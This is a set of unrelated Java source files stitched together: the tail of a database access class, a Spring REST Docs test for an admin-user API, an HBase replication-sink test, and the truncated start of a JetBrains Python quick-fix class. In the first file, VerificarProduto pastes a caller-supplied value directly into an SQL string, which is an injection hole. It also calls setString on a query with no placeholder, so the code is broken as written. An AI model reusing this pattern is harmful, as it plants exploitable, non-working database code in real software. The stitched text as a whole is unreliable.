ResultSet rs;
stmt = Conexao.getConnection().createStatement();
rs = stmt.executeQuery(Sql);
while(rs.next()) {
valor = rs.getDouble("precoSaida");
codDetProduto = rs.getInt("idDetProduto");
}
rs.close();
stmt.close();
} catch (SQLException ex) {
            Logger.getLogger(ProdutoDAO.class.getName()).log(Level.SEVERE, null, ex);
            throw new RuntimeException("Error loading product price data: ", ex);
}
return valor;
}
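    // Returns true when a client with the given CNPJ already exists in tabcliente.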
public static boolean VerificarProduto(String cliente) {
        PreparedStatement stmt;
boolean achou = true;
int cli = 0;
//"SELECT * FROM tabcliente WHERE empresa IN (SELECT E.equipamento FROM tabequipamento E GROUP BY E.equipamento HAVING COUNT(*) > 1) ORDER BY equipamento";
String Sql = "SELECT COUNT(0), empresa, cnpj FROM tabcliente WHERE cnpj = '" + cliente + "';";
try {
ResultSet rs;
            stmt = Conexao.getConnection().prepareStatement(Sql);
            stmt.setString(1, cliente);
            rs = stmt.executeQuery();
            if (rs.next()) {
                cli = rs.getInt(1);
            }
if (cli == 0) {
achou = false;
}
rs.close();
stmt.close();
} catch (SQLException ex) {
            Logger.getLogger(ProdutoDAO.class.getName()).log(Level.SEVERE, null, ex);
            throw new RuntimeException("Error loading client data: ", ex);
}
return achou;
}
}
|
|
package io.smsc.repository.admin;
import io.smsc.model.admin.User;
import io.smsc.AbstractSpringMVCTest;
import io.smsc.model.customer.Salutation;
import org.junit.Test;
import org.springframework.restdocs.payload.FieldDescriptor;
import org.springframework.security.test.context.support.WithMockUser;
import java.util.Date;
import static org.hamcrest.Matchers.*;
import static org.springframework.restdocs.mockmvc.MockMvcRestDocumentation.document;
import static org.springframework.restdocs.operation.preprocess.Preprocessors.*;
import static org.springframework.restdocs.snippet.Attributes.key;
import static org.springframework.security.test.web.servlet.request.SecurityMockMvcRequestPostProcessors.csrf;
import static org.springframework.restdocs.payload.PayloadDocumentation.*;
import static org.springframework.restdocs.mockmvc.RestDocumentationRequestBuilders.*;
import static org.springframework.test.web.servlet.result.MockMvcResultMatchers.*;
import static org.springframework.restdocs.request.RequestDocumentation.*;
@WithMockUser(username = "admin", roles = {"POWER_ADMIN_USER"})
public class UserRestTest extends AbstractSpringMVCTest {
@Test
public void testGetSingleAdminUser() throws Exception {
mockMvc.perform(get("/rest/repository/users/{id}", 1))
.andExpect(status().isOk())
.andExpect(jsonPath("$.username", is("user")))
.andExpect(jsonPath("$.firstname", is("userName")))
.andExpect(jsonPath("$.surname", is("userSurname")))
.andExpect(jsonPath("$.email", is("[email protected]")))
.andExpect(jsonPath("$.active", is(true)))
.andExpect(jsonPath("$.blocked", is(false)))
.andExpect(jsonPath("$.salutation", is(Salutation.MR.toString())))
.andDo(document("getAdminUser",
preprocessRequest(prettyPrint()),
preprocessResponse(prettyPrint()),
pathParameters(getPathParam("AdminUser")),
responseFields(adminUserFieldsForResponse(false))));
}
@Test
public void testAdminUserNotFound() throws Exception {
mockMvc.perform(get("/rest/repository/users/999")
.contentType("application/json;charset=UTF-8"))
.andExpect(status().isNotFound());
}
@Test
public void testGetAllAdminUsers() throws Exception {
mockMvc.perform(get("/rest/repository/users?page=0&size=5"))
.andExpect(status().isOk())
.andExpect(jsonPath("$._embedded.users", hasSize(3)))
.andExpect(jsonPath("$._embedded.users[0].username", is("user")))
.andExpect(jsonPath("$._embedded.users[0].firstname", is("userName")))
.andExpect(jsonPath("$._embedded.users[0].surname", is("userSurname")))
.andExpect(jsonPath("$._embedded.users[0].email", is("[email protected]")))
.andExpect(jsonPath("$._embedded.users[0].active", is(true)))
.andExpect(jsonPath("$._embedded.users[0].blocked", is(false)))
.andExpect(jsonPath("$._embedded.users[0].salutation", is(Salutation.MR.toString())))
.andExpect(jsonPath("$._embedded.users[1].username", is("demo")))
.andExpect(jsonPath("$._embedded.users[1].firstname", is("demoName")))
.andExpect(jsonPath("$._embedded.users[1].surname", is("demoSurname")))
.andExpect(jsonPath("$._embedded.users[1].email", is("[email protected]")))
.andExpect(jsonPath("$._embedded.users[1].active", is(true)))
.andExpect(jsonPath("$._embedded.users[1].blocked", is(false)))
.andExpect(jsonPath("$._embedded.users[1].salutation", is(Salutation.MR.toString())))
.andExpect(jsonPath("$._embedded.users[2].username", is("admin")))
.andExpect(jsonPath("$._embedded.users[2].firstname", is("adminName")))
.andExpect(jsonPath("$._embedded.users[2].surname", is("adminSurname")))
.andExpect(jsonPath("$._embedded.users[2].email", is("[email protected]")))
.andExpect(jsonPath("$._embedded.users[2].active", is(true)))
.andExpect(jsonPath("$._embedded.users[2].blocked", is(false)))
.andExpect(jsonPath("$._embedded.users[2].salutation", is(Salutation.MRS.toString())))
.andDo(document("getAdminUsers",
preprocessRequest(prettyPrint()),
preprocessResponse(prettyPrint()),
requestParameters(
parameterWithName("page").description("Page of results"),
parameterWithName("size").description("Size of results")),
responseFields(adminUserFieldsForResponse(true))));
}
@Test
public void testCreateAdminUser() throws Exception {
User user = new User();
user.setUsername("Old Johnny");
user.setFirstname("John");
user.setSurname("Forrester");
user.setEmail("[email protected]");
user.setActive(true);
user.setBlocked(false);
user.setSalutation(Salutation.MR);
String userJson = json(user);
// json is ignoring password
userJson = userJson.substring(0, userJson.length() - 1).concat(", \"password\" : \"john123456\" \r\n }");
this.mockMvc.perform(post("/rest/repository/users")
.with(csrf())
.contentType("application/json;charset=UTF-8")
.content(userJson))
.andExpect(status().isCreated())
.andDo(document("createAdminUser",
preprocessRequest(prettyPrint()),
preprocessResponse(prettyPrint()),
requestFields(adminUserFieldsForRequest(false)),
responseFields(adminUserFieldsForResponse(false))));
}
@Test
public void testDeleteAdminUser() throws Exception {
mockMvc.perform(delete("/rest/repository/users/{id}", 1)
.with(csrf()))
.andDo(document("deleteAdminUser",
preprocessRequest(prettyPrint()),
preprocessResponse(prettyPrint()),
pathParameters(getPathParam("AdminUser"))));
mockMvc.perform(get("/rest/repository/users/1"))
.andExpect(status().isNotFound());
}
@Test
public void testUpdateAdminUser() throws Exception {
mockMvc.perform(patch("/rest/repository/users/{id}", 1)
.with(csrf())
.contentType("application/json;charset=UTF-8")
.content("{ \"username\" : \"Old Johnny\" }"))
.andExpect(status().isOk())
.andDo(document("updateAdminUser",
preprocessRequest(prettyPrint()),
preprocessResponse(prettyPrint()),
pathParameters(getPathParam("AdminUser")),
requestFields(adminUserFieldsForRequest(true)),
responseFields(adminUserFieldsForResponse(false))));
mockMvc.perform(get("/rest/repository/users/1"))
.andExpect(status().isOk())
.andExpect(jsonPath("$.username", is("Old Johnny")));
}
@Test
public void testReplaceAdminUser() throws Exception {
User user = new User();
user.setId(1L);
user.setUsername("Old Johnny");
user.setFirstname("John");
user.setSurname("Forrester");
user.setEmail("[email protected]");
user.setActive(false);
user.setBlocked(true);
user.setSalutation(Salutation.MR);
String userJson = json(user);
// json is ignoring password
userJson = userJson.substring(0, userJson.length() - 1).concat(", \"password\" : \"john123456\" \r\n }");
mockMvc.perform(put("/rest/repository/users/{id}", 1)
.with(csrf())
.contentType("application/json;charset=UTF-8")
.content(userJson))
.andExpect(status().isOk())
.andDo(document("replaceAdminUser",
preprocessRequest(prettyPrint()),
preprocessResponse(prettyPrint()),
pathParameters(getPathParam("AdminUser")),
requestFields(adminUserFieldsForRequest(false)),
responseFields(adminUserFieldsForResponse(false))));
mockMvc.perform(get("/rest/repository/users/1"))
.andExpect(status().isOk())
.andExpect(jsonPath("$.username", is("Old Johnny")))
.andExpect(jsonPath("$.firstname", is("John")))
.andExpect(jsonPath("$.surname", is("Forrester")))
.andExpect(jsonPath("$.email", is("[email protected]")))
.andExpect(jsonPath("$.active", is(false)))
.andExpect(jsonPath("$.blocked", is(true)));
}
/**
     * AdminUser fields used in responses, either for a single resource or for the embedded JSON array of a
     * collection resource.
     *
     * @param isJsonArray if the fields are used in a JSON array
     * @return the array of FieldDescriptors
*/
private FieldDescriptor[] adminUserFieldsForResponse(boolean isJsonArray) {
return isJsonArray ?
new FieldDescriptor[]{
fieldWithPath("_embedded.users[]").description("AdminUsers list"),
fieldWithPath("_embedded.users[].id").description("AdminUser's id"),
fieldWithPath("_embedded.users[].salutation").type(Salutation.class)
.description("AdminUser's salutation"),
fieldWithPath("_embedded.users[].username").description("AdminUser's username"),
fieldWithPath("_embedded.users[].firstname").description("AdminUser's firstname"),
fieldWithPath("_embedded.users[].surname").description("AdminUser's surname"),
fieldWithPath("_embedded.users[].email").description("AdminUser's email"),
fieldWithPath("_embedded.users[].active").description("AdminUser's active"),
fieldWithPath("_embedded.users[].created").description("AdminUser's created"),
fieldWithPath("_embedded.users[].blocked").description("AdminUser's blocked"),
fieldWithPath("_embedded.users[].lastModifiedDate").type(Date.class)
.description("AdminUser's date of last modification"),
fieldWithPath("_links").optional().ignored(),
fieldWithPath("page").optional().ignored()
} :
new FieldDescriptor[]{
fieldWithPath("id").description("AdminUser's id"),
fieldWithPath("salutation").type(Salutation.class).description("AdminUser's salutation"),
fieldWithPath("username").description("AdminUser's username"),
fieldWithPath("firstname").description("AdminUser's firstname"),
fieldWithPath("surname").description("AdminUser's surname"),
fieldWithPath("email").description("AdminUser's email"),
fieldWithPath("active").description("AdminUser's active"),
fieldWithPath("created").description("AdminUser's created"),
fieldWithPath("blocked").description("AdminUser's blocked"),
fieldWithPath("lastModifiedDate").type(Date.class).type(Date.class)
.description("AdminUser's date of last modification"),
fieldWithPath("_links").optional().ignored(),
fieldWithPath("page").optional().ignored()
};
}
/**
     * AdminUser fields used in requests.
     *
     * @param isPatchRequest if the fields are used in a PATCH request, where every field is optional
     * @return the array of FieldDescriptors
*/
private FieldDescriptor[] adminUserFieldsForRequest(boolean isPatchRequest) {
return isPatchRequest ?
new FieldDescriptor[]{
fieldWithPath("salutation").optional().type(Salutation.class).description("AdminUser's salutation")
.attributes(key("mandatory").value(false)),
fieldWithPath("username").optional().type(String.class).description("AdminUser's username")
.attributes(key("mandatory").value(false)),
fieldWithPath("password").optional().type(String.class).description("AdminUser's password")
.attributes(key("mandatory").value(false)),
fieldWithPath("firstname").optional().type(String.class).description("AdminUser's firstname")
.attributes(key("mandatory").value(false)),
fieldWithPath("surname").optional().type(String.class).description("AdminUser's surname")
.attributes(key("mandatory").value(false)),
fieldWithPath("email").optional().type(String.class).description("AdminUser's email")
.attributes(key("mandatory").value(false)),
fieldWithPath("active").optional().type(Boolean.class).description("AdminUser's active")
.attributes(key("mandatory").value(false)),
fieldWithPath("blocked").optional().type(Boolean.class).description("AdminUser's blocked")
.attributes(key("mandatory").value(false)),
fieldWithPath("created").optional().ignored(),
fieldWithPath("id").optional().ignored(),
fieldWithPath("lastModifiedDate").optional().ignored(),
fieldWithPath("_links").optional().ignored(),
fieldWithPath("page").optional().ignored()
} :
new FieldDescriptor[]{
fieldWithPath("salutation").type(Salutation.class).description("AdminUser's salutation")
.attributes(key("mandatory").value(true)),
fieldWithPath("username").type(String.class).description("AdminUser's username")
.attributes(key("mandatory").value(true)),
fieldWithPath("password").type(String.class).description("AdminUser's password")
.attributes(key("mandatory").value(true)),
fieldWithPath("firstname").type(String.class).description("AdminUser's firstname")
.attributes(key("mandatory").value(true)),
fieldWithPath("surname").type(String.class).description("AdminUser's surname")
.attributes(key("mandatory").value(true)),
fieldWithPath("email").type(String.class).description("AdminUser's email")
.attributes(key("mandatory").value(true)),
fieldWithPath("active").type(Boolean.class).description("AdminUser's active")
.attributes(key("mandatory").value(true)),
fieldWithPath("blocked").type(Boolean.class).description("AdminUser's blocked")
.attributes(key("mandatory").value(true)),
fieldWithPath("created").optional().ignored(),
fieldWithPath("id").optional().ignored(),
fieldWithPath("lastModifiedDate").optional().ignored(),
fieldWithPath("_links").optional().ignored(),
fieldWithPath("page").optional().ignored()
};
}
}
|
|
/*
* Licensed to the Apache Software Foundation (ASF) under one
* or more contributor license agreements. See the NOTICE file
* distributed with this work for additional information
* regarding copyright ownership. The ASF licenses this file
* to you under the Apache License, Version 2.0 (the
* "License"); you may not use this file except in compliance
* with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.apache.hadoop.hbase.replication.regionserver;
import static org.junit.Assert.assertEquals;
import static org.junit.Assert.assertTrue;
import java.security.SecureRandom;
import java.util.ArrayList;
import java.util.Collections;
import java.util.HashMap;
import java.util.HashSet;
import java.util.Iterator;
import java.util.List;
import java.util.Map;
import java.util.Random;
import java.util.Set;
import java.util.concurrent.atomic.AtomicBoolean;
import org.apache.hadoop.conf.Configuration;
import org.apache.hadoop.fs.FileSystem;
import org.apache.hadoop.fs.FileUtil;
import org.apache.hadoop.fs.Path;
import org.apache.hadoop.hbase.Cell;
import org.apache.hadoop.hbase.CellUtil;
import org.apache.hadoop.hbase.HBaseClassTestRule;
import org.apache.hadoop.hbase.HBaseTestingUtility;
import org.apache.hadoop.hbase.HConstants;
import org.apache.hadoop.hbase.HRegionInfo;
import org.apache.hadoop.hbase.KeyValue;
import org.apache.hadoop.hbase.Stoppable;
import org.apache.hadoop.hbase.TableName;
import org.apache.hadoop.hbase.TableNotFoundException;
import org.apache.hadoop.hbase.client.Admin;
import org.apache.hadoop.hbase.client.Connection;
import org.apache.hadoop.hbase.client.ConnectionFactory;
import org.apache.hadoop.hbase.client.Get;
import org.apache.hadoop.hbase.client.RegionLocator;
import org.apache.hadoop.hbase.client.Result;
import org.apache.hadoop.hbase.client.ResultScanner;
import org.apache.hadoop.hbase.client.RetriesExhaustedWithDetailsException;
import org.apache.hadoop.hbase.client.Scan;
import org.apache.hadoop.hbase.client.Table;
import org.apache.hadoop.hbase.testclassification.MediumTests;
import org.apache.hadoop.hbase.testclassification.ReplicationTests;
import org.apache.hadoop.hbase.util.Bytes;
import org.apache.hadoop.hbase.util.FSUtils;
import org.apache.hadoop.hbase.util.HFileTestUtil;
import org.junit.AfterClass;
import org.junit.Assert;
import org.junit.Before;
import org.junit.BeforeClass;
import org.junit.ClassRule;
import org.junit.Test;
import org.junit.experimental.categories.Category;
import org.slf4j.Logger;
import org.slf4j.LoggerFactory;
import org.apache.hbase.thirdparty.com.google.protobuf.UnsafeByteOperations;
import org.apache.hadoop.hbase.shaded.protobuf.ProtobufUtil;
import org.apache.hadoop.hbase.shaded.protobuf.generated.AdminProtos.WALEntry;
import org.apache.hadoop.hbase.shaded.protobuf.generated.HBaseProtos.UUID;
import org.apache.hadoop.hbase.shaded.protobuf.generated.WALProtos;
import org.apache.hadoop.hbase.shaded.protobuf.generated.WALProtos.WALKey;
@Category({ReplicationTests.class, MediumTests.class})
public class TestReplicationSink {
@ClassRule
public static final HBaseClassTestRule CLASS_RULE =
HBaseClassTestRule.forClass(TestReplicationSink.class);
private static final Logger LOG = LoggerFactory.getLogger(TestReplicationSink.class);
private static final int BATCH_SIZE = 10;
protected final static HBaseTestingUtility TEST_UTIL = new HBaseTestingUtility();
protected static ReplicationSink SINK;
protected static final TableName TABLE_NAME1 = TableName.valueOf("table1");
protected static final TableName TABLE_NAME2 = TableName.valueOf("table2");
protected static final byte[] FAM_NAME1 = Bytes.toBytes("info1");
protected static final byte[] FAM_NAME2 = Bytes.toBytes("info2");
protected static Table table1;
protected static Stoppable STOPPABLE = new Stoppable() {
final AtomicBoolean stop = new AtomicBoolean(false);
@Override
public boolean isStopped() {
return this.stop.get();
}
@Override
public void stop(String why) {
LOG.info("STOPPING BECAUSE: " + why);
this.stop.set(true);
}
};
protected static Table table2;
protected static String baseNamespaceDir;
protected static String hfileArchiveDir;
protected static String replicationClusterId;
/**
* @throws java.lang.Exception
*/
@BeforeClass
public static void setUpBeforeClass() throws Exception {
TEST_UTIL.getConfiguration().set("hbase.replication.source.fs.conf.provider",
TestSourceFSConfigurationProvider.class.getCanonicalName());
TEST_UTIL.startMiniCluster(3);
SINK = new ReplicationSink(new Configuration(TEST_UTIL.getConfiguration()), STOPPABLE);
table1 = TEST_UTIL.createTable(TABLE_NAME1, FAM_NAME1);
table2 = TEST_UTIL.createTable(TABLE_NAME2, FAM_NAME2);
Path rootDir = FSUtils.getRootDir(TEST_UTIL.getConfiguration());
baseNamespaceDir = new Path(rootDir, new Path(HConstants.BASE_NAMESPACE_DIR)).toString();
hfileArchiveDir = new Path(rootDir, new Path(HConstants.HFILE_ARCHIVE_DIRECTORY)).toString();
replicationClusterId = "12345";
}
/**
* @throws java.lang.Exception
*/
@AfterClass
public static void tearDownAfterClass() throws Exception {
STOPPABLE.stop("Shutting down");
TEST_UTIL.shutdownMiniCluster();
}
/**
* @throws java.lang.Exception
*/
@Before
public void setUp() throws Exception {
table1 = TEST_UTIL.deleteTableData(TABLE_NAME1);
table2 = TEST_UTIL.deleteTableData(TABLE_NAME2);
}
/**
* Insert a whole batch of entries
* @throws Exception
*/
@Test
public void testBatchSink() throws Exception {
List<WALEntry> entries = new ArrayList<>(BATCH_SIZE);
List<Cell> cells = new ArrayList<>();
for(int i = 0; i < BATCH_SIZE; i++) {
entries.add(createEntry(TABLE_NAME1, i, KeyValue.Type.Put, cells));
}
SINK.replicateEntries(entries, CellUtil.createCellScanner(cells.iterator()),
replicationClusterId, baseNamespaceDir, hfileArchiveDir);
Scan scan = new Scan();
ResultScanner scanRes = table1.getScanner(scan);
assertEquals(BATCH_SIZE, scanRes.next(BATCH_SIZE).length);
}
/**
* Insert a mix of puts and deletes
* @throws Exception
*/
@Test
public void testMixedPutDelete() throws Exception {
List<WALEntry> entries = new ArrayList<>(BATCH_SIZE/2);
List<Cell> cells = new ArrayList<>();
for(int i = 0; i < BATCH_SIZE/2; i++) {
entries.add(createEntry(TABLE_NAME1, i, KeyValue.Type.Put, cells));
}
SINK.replicateEntries(entries, CellUtil.createCellScanner(cells), replicationClusterId,
baseNamespaceDir, hfileArchiveDir);
entries = new ArrayList<>(BATCH_SIZE);
cells = new ArrayList<>();
for(int i = 0; i < BATCH_SIZE; i++) {
entries.add(createEntry(TABLE_NAME1, i,
i % 2 != 0 ? KeyValue.Type.Put: KeyValue.Type.DeleteColumn, cells));
}
SINK.replicateEntries(entries, CellUtil.createCellScanner(cells.iterator()),
replicationClusterId, baseNamespaceDir, hfileArchiveDir);
Scan scan = new Scan();
ResultScanner scanRes = table1.getScanner(scan);
assertEquals(BATCH_SIZE/2, scanRes.next(BATCH_SIZE).length);
}
/**
* Insert to 2 different tables
* @throws Exception
*/
@Test
public void testMixedPutTables() throws Exception {
List<WALEntry> entries = new ArrayList<>(BATCH_SIZE/2);
List<Cell> cells = new ArrayList<>();
for(int i = 0; i < BATCH_SIZE; i++) {
entries.add(createEntry( i % 2 == 0 ? TABLE_NAME2 : TABLE_NAME1,
i, KeyValue.Type.Put, cells));
}
SINK.replicateEntries(entries, CellUtil.createCellScanner(cells.iterator()),
replicationClusterId, baseNamespaceDir, hfileArchiveDir);
Scan scan = new Scan();
ResultScanner scanRes = table2.getScanner(scan);
for(Result res : scanRes) {
assertTrue(Bytes.toInt(res.getRow()) % 2 == 0);
}
}
/**
* Insert then do different types of deletes
* @throws Exception
*/
@Test
public void testMixedDeletes() throws Exception {
List<WALEntry> entries = new ArrayList<>(3);
List<Cell> cells = new ArrayList<>();
for(int i = 0; i < 3; i++) {
entries.add(createEntry(TABLE_NAME1, i, KeyValue.Type.Put, cells));
}
SINK.replicateEntries(entries, CellUtil.createCellScanner(cells.iterator()),
replicationClusterId, baseNamespaceDir, hfileArchiveDir);
entries = new ArrayList<>(3);
cells = new ArrayList<>();
entries.add(createEntry(TABLE_NAME1, 0, KeyValue.Type.DeleteColumn, cells));
entries.add(createEntry(TABLE_NAME1, 1, KeyValue.Type.DeleteFamily, cells));
entries.add(createEntry(TABLE_NAME1, 2, KeyValue.Type.DeleteColumn, cells));
SINK.replicateEntries(entries, CellUtil.createCellScanner(cells.iterator()),
replicationClusterId, baseNamespaceDir, hfileArchiveDir);
Scan scan = new Scan();
ResultScanner scanRes = table1.getScanner(scan);
assertEquals(0, scanRes.next(3).length);
}
/**
* Puts are buffered, but this tests when a delete (not-buffered) is applied
* before the actual Put that creates it.
* @throws Exception
*/
@Test
public void testApplyDeleteBeforePut() throws Exception {
List<WALEntry> entries = new ArrayList<>(5);
List<Cell> cells = new ArrayList<>();
for(int i = 0; i < 2; i++) {
entries.add(createEntry(TABLE_NAME1, i, KeyValue.Type.Put, cells));
}
entries.add(createEntry(TABLE_NAME1, 1, KeyValue.Type.DeleteFamily, cells));
for(int i = 3; i < 5; i++) {
entries.add(createEntry(TABLE_NAME1, i, KeyValue.Type.Put, cells));
}
SINK.replicateEntries(entries, CellUtil.createCellScanner(cells.iterator()),
replicationClusterId, baseNamespaceDir, hfileArchiveDir);
Get get = new Get(Bytes.toBytes(1));
Result res = table1.get(get);
assertEquals(0, res.size());
}
@Test
public void testRethrowRetriesExhaustedWithDetailsException() throws Exception {
TableName notExistTable = TableName.valueOf("notExistTable");
List<WALEntry> entries = new ArrayList<>();
List<Cell> cells = new ArrayList<>();
for (int i = 0; i < 10; i++) {
entries.add(createEntry(notExistTable, i, KeyValue.Type.Put, cells));
}
try {
SINK.replicateEntries(entries, CellUtil.createCellScanner(cells.iterator()),
replicationClusterId, baseNamespaceDir, hfileArchiveDir);
Assert.fail("Should re-throw TableNotFoundException.");
    } catch (TableNotFoundException e) {
      // expected: the sink should surface the TableNotFoundException
    }
entries.clear();
cells.clear();
for (int i = 0; i < 10; i++) {
entries.add(createEntry(TABLE_NAME1, i, KeyValue.Type.Put, cells));
}
try (Connection conn = ConnectionFactory.createConnection(TEST_UTIL.getConfiguration())) {
try (Admin admin = conn.getAdmin()) {
admin.disableTable(TABLE_NAME1);
try {
SINK.replicateEntries(entries, CellUtil.createCellScanner(cells.iterator()),
replicationClusterId, baseNamespaceDir, hfileArchiveDir);
Assert.fail("Should re-throw RetriesExhaustedWithDetailsException.");
        } catch (RetriesExhaustedWithDetailsException e) {
          // expected: writes against the disabled table should exhaust retries
} finally {
admin.enableTable(TABLE_NAME1);
}
}
}
}
/**
* Test replicateEntries with a bulk load entry for 25 HFiles
*/
@Test
public void testReplicateEntriesForHFiles() throws Exception {
Path dir = TEST_UTIL.getDataTestDirOnTestFS("testReplicateEntries");
Path familyDir = new Path(dir, Bytes.toString(FAM_NAME1));
int numRows = 10;
List<Path> p = new ArrayList<>(1);
final String hfilePrefix = "hfile-";
// 1. Generate 25 hfile ranges
Random rng = new SecureRandom();
Set<Integer> numbers = new HashSet<>();
while (numbers.size() < 50) {
numbers.add(rng.nextInt(1000));
}
List<Integer> numberList = new ArrayList<>(numbers);
Collections.sort(numberList);
Map<String, Long> storeFilesSize = new HashMap<>(1);
// 2. Create 25 hfiles
Configuration conf = TEST_UTIL.getConfiguration();
FileSystem fs = dir.getFileSystem(conf);
Iterator<Integer> numbersItr = numberList.iterator();
for (int i = 0; i < 25; i++) {
Path hfilePath = new Path(familyDir, hfilePrefix + i);
HFileTestUtil.createHFile(conf, fs, hfilePath, FAM_NAME1, FAM_NAME1,
Bytes.toBytes(numbersItr.next()), Bytes.toBytes(numbersItr.next()), numRows);
p.add(hfilePath);
storeFilesSize.put(hfilePath.getName(), fs.getFileStatus(hfilePath).getLen());
}
// 3. Create a BulkLoadDescriptor and a WALEdit
Map<byte[], List<Path>> storeFiles = new HashMap<>(1);
storeFiles.put(FAM_NAME1, p);
org.apache.hadoop.hbase.wal.WALEdit edit = null;
WALProtos.BulkLoadDescriptor loadDescriptor = null;
try (Connection c = ConnectionFactory.createConnection(conf);
RegionLocator l = c.getRegionLocator(TABLE_NAME1)) {
HRegionInfo regionInfo = l.getAllRegionLocations().get(0).getRegionInfo();
loadDescriptor =
ProtobufUtil.toBulkLoadDescriptor(TABLE_NAME1,
UnsafeByteOperations.unsafeWrap(regionInfo.getEncodedNameAsBytes()),
storeFiles, storeFilesSize, 1);
edit = org.apache.hadoop.hbase.wal.WALEdit.createBulkLoadEvent(regionInfo,
loadDescriptor);
}
List<WALEntry> entries = new ArrayList<>(1);
// 4. Create a WALEntryBuilder
WALEntry.Builder builder = createWALEntryBuilder(TABLE_NAME1);
// 5. Copy the hfile to the path as it is in reality
for (int i = 0; i < 25; i++) {
String pathToHfileFromNS =
new StringBuilder(100).append(TABLE_NAME1.getNamespaceAsString()).append(Path.SEPARATOR)
.append(Bytes.toString(TABLE_NAME1.getName())).append(Path.SEPARATOR)
.append(Bytes.toString(loadDescriptor.getEncodedRegionName().toByteArray()))
.append(Path.SEPARATOR).append(Bytes.toString(FAM_NAME1)).append(Path.SEPARATOR)
.append(hfilePrefix + i).toString();
String dst = baseNamespaceDir + Path.SEPARATOR + pathToHfileFromNS;
Path dstPath = new Path(dst);
FileUtil.copy(fs, p.get(0), fs, dstPath, false, conf);
}
entries.add(builder.build());
try (ResultScanner scanner = table1.getScanner(new Scan())) {
// 6. Assert no existing data in table
assertEquals(0, scanner.next(numRows).length);
}
// 7. Replicate the bulk loaded entry
SINK.replicateEntries(entries, CellUtil.createCellScanner(edit.getCells().iterator()),
replicationClusterId, baseNamespaceDir, hfileArchiveDir);
try (ResultScanner scanner = table1.getScanner(new Scan())) {
// 8. Assert data is replicated
assertEquals(numRows, scanner.next(numRows).length);
}
// Clean up the created hfiles or it will mess up subsequent tests
}
private WALEntry createEntry(TableName table, int row, KeyValue.Type type, List<Cell> cells) {
byte[] fam = table.equals(TABLE_NAME1) ? FAM_NAME1 : FAM_NAME2;
byte[] rowBytes = Bytes.toBytes(row);
// Just make sure we don't get the same ts for two consecutive rows with
// same key
try {
Thread.sleep(1);
} catch (InterruptedException e) {
LOG.info("Was interrupted while sleep, meh", e);
}
final long now = System.currentTimeMillis();
KeyValue kv = null;
if(type.getCode() == KeyValue.Type.Put.getCode()) {
kv = new KeyValue(rowBytes, fam, fam, now,
KeyValue.Type.Put, Bytes.toBytes(row));
} else if (type.getCode() == KeyValue.Type.DeleteColumn.getCode()) {
kv = new KeyValue(rowBytes, fam, fam,
now, KeyValue.Type.DeleteColumn);
} else if (type.getCode() == KeyValue.Type.DeleteFamily.getCode()) {
kv = new KeyValue(rowBytes, fam, null,
now, KeyValue.Type.DeleteFamily);
}
WALEntry.Builder builder = createWALEntryBuilder(table);
cells.add(kv);
return builder.build();
}
public static WALEntry.Builder createWALEntryBuilder(TableName table) {
WALEntry.Builder builder = WALEntry.newBuilder();
builder.setAssociatedCellCount(1);
WALKey.Builder keyBuilder = WALKey.newBuilder();
UUID.Builder uuidBuilder = UUID.newBuilder();
uuidBuilder.setLeastSigBits(HConstants.DEFAULT_CLUSTER_ID.getLeastSignificantBits());
uuidBuilder.setMostSigBits(HConstants.DEFAULT_CLUSTER_ID.getMostSignificantBits());
keyBuilder.setClusterId(uuidBuilder.build());
keyBuilder.setTableName(UnsafeByteOperations.unsafeWrap(table.getName()));
keyBuilder.setWriteTime(System.currentTimeMillis());
keyBuilder.setEncodedRegionName(UnsafeByteOperations.unsafeWrap(HConstants.EMPTY_BYTE_ARRAY));
keyBuilder.setLogSequenceNumber(-1);
builder.setKey(keyBuilder.build());
return builder;
}
}
|
|
// Copyright 2000-2020 JetBrains s.r.o. Use of this source code is governed by the Apache 2.0 license that can be found in the LICENSE file.
package com.jetbrains.python.inspections.quickfix;
import com.google.common.collect.Iterators;
import com.google.common.collect.PeekingIterator;
import com.intellij.codeInspection.LocalQuickFixOnPsiElement;
import com.intellij.openapi.application.ApplicationManager;
import com.intellij.openapi.project.Project;
import com.intellij.openapi.util.Conditions;
import com.intellij.openapi.util.Disposer;
import com.intellij.openapi.util.Key;
import com.intellij.openapi.util.Pair;
import com.intellij.openapi.util.text.StringUtil;
import com.intellij.psi.PsiElement;
import com.intellij.psi.PsiFile;
import com.intellij.psi.SmartPointerManager;
import com.intellij.psi.SmartPsiElementPointer;
import com.intellij.util.containers.ContainerUtil;
import com.intellij.xml.util.XmlStringUtil;
import com.jetbrains.python.PyBundle;
import com.jetbrains.python.psi.*;
import com.jetbrains.python.psi.PyCallExpression.PyArgumentsMapping;
import com.jetbrains.python.psi.types.PyClassType;
import com.jetbrains.python.psi.types.PyType;
import com.jetbrains.python.psi.types.PyUnionType;
import com.jetbrains.python.psi.types.TypeEvalContext;
import com.jetbrains.python.refactoring.NameSuggesterUtil;
import com.jetbrains.python.refactoring.PyRefactoringUtil;
import com.jetbrains.python.refactoring.changeSignature.PyChangeSignatureDialog;
import com.jetbrains.python.refactoring.changeSignature.PyMethodDescriptor;
import com.jetbrains.python.refactoring.changeSignature.PyParameterInfo;
import one.util.streamex.StreamEx;
import org.jetbrains.annotations.NotNull;
import org.jetbrains.annotations.Nullable;
import java.util.*;
import static com.intellij.refactoring.changeSignature.ParameterInfo.NEW_PARAMETER;
import static com.jetbrains.python.psi.PyUtil.as;
public class PyChangeSignatureQuickFix extends LocalQuickFixOnPsiElement {
public static final Key<Boolean> CHANGE_SIGNATURE_ORIGINAL_CALL = Key.create("CHANGE_SIGNATURE_ORIGINAL_CALL");
@NotNull
public static PyChangeSignatureQuickFix forMismatchedCall(@NotNull PyArgumentsMapping mapping) {
assert mapping.getMarkedCallee() != null;
final PyFunction function = as(mapping.getMarkedCallee().getElement(), PyFunction.class);
assert function != null;
final PyCallSiteExpression callSiteExpression = mapping.getCallSiteExpression();
int positionalParamAnchor = -1;
final PyParameter[] parameters = function.getParameterList().getParameters();
for (PyParameter parameter : parameters) {
final PyNamedParameter namedParam = parameter.getAsNamed();
final boolean isVararg = namedParam != null && (namedParam.isPositionalContainer() || namedParam.isKeywordContainer());
if (parameter instanceof PySingleStarParameter || parameter.hasDefaultValue() || isVararg) {
break;
}
positionalParamAnchor++;
}
